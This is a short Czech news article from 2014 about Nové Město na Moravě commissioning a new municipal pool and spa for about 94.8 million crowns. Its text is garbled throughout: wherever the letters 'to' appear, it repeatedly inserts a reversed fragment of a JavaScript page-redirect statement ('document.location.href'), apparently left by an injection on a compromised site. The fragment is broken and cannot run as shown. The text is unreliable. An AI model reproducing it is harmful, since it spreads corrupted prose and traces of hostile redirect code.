Nové Město na Moravě, lázně, bazén, sauna
Rainbow page separator

Městské lázně postaví za necelých 95 milionů

Pátek, 28. března 2014

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Bazén v Hornické ulici postaví firmy PKS a IMOS, které se pro ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účel sdružily do společného subjektu. Schválilo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vedení novoměstské radnice.
Vysoutěžená cena se nakonec dostala na 94 milionů a 826 tisíc korun. Stavební práce v Hornické ulici vypuknou v květnu, kompletně ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo má být v září příštího roku.
Přízemí patrové budovy zaberou šatny, sprchy, plavecký bazén se čtyřmi drahami, relaxační bazén, brouzdaliště pro děti se skluzavkou a vířivka pro čtrnáct osob.
V prvním patře městských lázní vznikne wellness s Kneippovou lázní, finskou saunou a aromatickou solnou lázní. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho se tam vejde i fitness část a rovněž studený bufet, odkud bude možné přes schodiště a galerii vs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit do bazénu.
Suterénní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory se dají využít pro různé účely, například skladovací.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: Pixmac.cz